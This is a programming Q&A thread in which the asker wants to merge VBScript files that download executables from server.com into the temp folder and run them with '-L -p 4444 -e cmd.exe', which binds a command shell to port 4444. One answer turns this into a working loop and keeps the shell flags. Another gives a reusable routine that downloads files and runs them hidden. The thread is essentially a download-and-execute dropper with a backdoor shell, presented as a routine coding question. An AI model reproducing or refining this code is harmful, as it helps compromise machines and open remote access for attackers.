# How can I combine multiple .vbs script of the same function into one .vbs?

Tags: vbscript

I am trying to combine the .vbs scripts below into one .vbs. Below is sample of my code:

```
dim http_obj
dim stream_obj
dim shell_obj
set http_obj = CreateObject("Microsoft.XMLHTTP")
set stream_obj = CreateObject("ADODB.Stream")
set shell_obj = CreateObject("WScript.Shell")
URL = "http://server.com/download1.exe" 'Where to download the file from
FILENAME = "%Tmp%\download1.exe" 'Name to save the file (on the local system)
RUNCMD = "%Tmp%\download1.exe -L -p 4444 -e cmd.exe"
http_obj.open "GET", URL, False
http_obj.send
stream_obj.type = 1
stream_obj.open
stream_obj.write http_obj.responseBody
stream_obj.savetofile FILENAME, 2
shell_obj.run RUNCMD

Next

dim http_obj
dim stream_obj
dim shell_obj
set http_obj = CreateObject("Microsoft.XMLHTTP")
set stream_obj = CreateObject("ADODB.Stream")
set shell_obj = CreateObject("WScript.Shell")
URL = "http://server.com/download2.exe" 'Where to download the file from
FILENAME = "%Tmp%\download2.exe" 'Name to save the file (on the local system)
RUNCMD = "%Tmp%\download2.exe -L -p 4444 -e cmd.exe"
http_obj.open "GET", URL, False
http_obj.send
stream_obj.type = 1
stream_obj.open
stream_obj.write http_obj.responseBody
stream_obj.savetofile FILENAME, 2
shell_obj.run RUNCMD

Next

dim http_obj
dim stream_obj
dim shell_obj
set http_obj = CreateObject("Microsoft.XMLHTTP")
set stream_obj = CreateObject("ADODB.Stream")
set shell_obj = CreateObject("WScript.Shell")
URL = "http://server.com/download3.exe" 'Where to download the file from
FILENAME = "%Tmp%\download3.exe" 'Name to save the file (on the local system)
RUNCMD = "%Tmp%\download3.exe -L -p 4444 -e cmd.exe"
http_obj.open "GET", URL, False
http_obj.send
stream_obj.type = 1
stream_obj.open
stream_obj.write http_obj.responseBody
stream_obj.savetofile FILENAME, 2
shell_obj.run RUNCMD
```

When I tried to run the code above, I'm always getting an error as stated in the image below:

[Operation is not allowed when the object is open](https://prnt.sc/qvdbv1)

Best solution to fix this or to make script wait and complete before proceeding to the next. will be greatly appreciated.

**What I have tried:**
I have tried using:
Next, WScript.Sleep 1000 and Delay syntax but none is working as expected.

Answer (score 0):

I see several other issues with your example script besides the one reported: not closing the ADODB.Stream.  For example, re-DIM of previously DIM'd variables, `Next` without `For`, lack of code re-use, etc.

See if this helps (untested):

```
dim http_obj : set http_obj = CreateObject("Microsoft.XMLHTTP")
dim stream_obj : set stream_obj = CreateObject("ADODB.Stream")
dim shell_obj : set shell_obj = CreateObject("WScript.Shell")
dim i, download, URL, FILENAME, RUNCMD

For i = 1 To 3
    download = "download" & CStr(i) & ".exe"

    URL = "http://server.com/" & download 'Where to download the file from
    http_obj.open "GET", URL, False
    http_obj.send

    FILENAME = "%Tmp%\" & download 'Name to save the file (on the local system)
    stream_obj.type = 1
    stream_obj.open
    stream_obj.write http_obj.responseBody
    stream_obj.savetofile FILENAME, 2
    stream_obj.close

    RUNCMD = FILENAME & " -L -p 4444 -e cmd.exe"
    shell_obj.run RUNCMD
Next
```

I might also suggest some error-handling, checking the http_obj status for a proper response code before using responseBody, checking for file existence before running the RUNCMD, and possibly sleeping briefly between stream close and RUNCMD if the file is large and you have on-access scanning enabled.

Enjoy.

Comment: Please I need to download and excute more than a file onw after the other. How am I going to acgeive this?

Comment: I have tired this method but it\s not working for me.

Answer (score 0):

Here is an example that download some images from internet and execute them, so you can get inspired by this code and change it to your purpose :

```
Option Explicit
Dim ws,TempFolder,Arr_Images,Img,Save2File
Set ws = CreateObject("WScript.Shell")
TempFolder = ws.ExpandEnvironmentStrings("%Temp%")

Arr_Images = Array(_
"https://apod.nasa.gov/apod/image/2001/DesertEclipse_Daviron_960.jpg",_
"https://apod.nasa.gov/apod/image/2001/ic410_WISEantonucci_960.jpg",_
"https://apod.nasa.gov/apod/image/2001/StoneyWay_Jacobs_960.jpg",_
"https://apod.nasa.gov/apod/image/2001/RubinsGalaxy_hst1024.jpg",_
"https://images.pexels.com/photos/414612/pexels-photo-414612.jpeg"_
)

For each Img in Arr_Images
    Save2File = TempFolder & "\" & GetFileNamefromDirectLink(Img)
    Download Img,Save2File
    Execute Save2File
Next
wscript.echo "Done"
'----------------------------------------------------------------------------------------------------
Sub Download(URL,Save2File)
    Dim File,Line,BS,ws
    On Error Resume Next
    Set File = CreateObject("WinHttp.WinHttpRequest.5.1")
    File.Open "GET",URL, False
    File.Send()
    If err.number <> 0 then
        Line  = Line &  vbcrlf & "Error Getting File"
        Line  = Line &  vbcrlf & "Error " & err.number & "(0x" & hex(err.number) & ") " &  vbcrlf &_
        err.description
        Line  = Line &  vbcrlf & "Source " & err.source
        MsgBox Line,vbCritical,"Error getting file"
        Err.clear
        wscript.quit
    End If
    If File.Status = 200 Then ' File exists and it is ready to be downloaded
        Set BS = CreateObject("ADODB.Stream")
        Set ws = CreateObject("wscript.Shell")
        BS.type = 1
        BS.open
        BS.Write File.ResponseBody
        BS.SaveToFile Save2File, 2
    ElseIf File.Status = 404 Then
        MsgBox "File Not found : " & File.Status,vbCritical,"Error File Not Found"
    Else
        MsgBox "Unknown Error : " & File.Status,vbCritical,"Error getting file"
    End If
End Sub
'-------------------------------------------------------------------------------------------------
Function GetFileNamefromDirectLink(URL)
    Dim ArrFile,FileName
    ArrFile = Split(URL,"/")
    FileName = ArrFile(UBound(ArrFile))
    GetFileNamefromDirectLink = FileName
End Function
'-------------------------------------------------------------------------------------------------
Function Execute(StrCmd)
        Dim ws,MyCmd,Result
        Set ws = CreateObject("wscript.Shell")
        MyCmd = "CMD /C " & StrCmd & " "
        Result = ws.run(MyCmd,0,True)
        Execute = Result
End Function
'-------------------------------------------------------------------------------------------------
```

Comment: How can this code be implemented for the fowllowing please:
Download as: 
http://server.com/file1_1.exe,
http://server.com/file2_2.exe,
http://server.com/file3_3.exe

Save as:
filea_a.exe,
fileb_b.exe,
filec_c.exe

Then Execute:
filea_a.exe,
fileb_b.exe,
filec_c.exe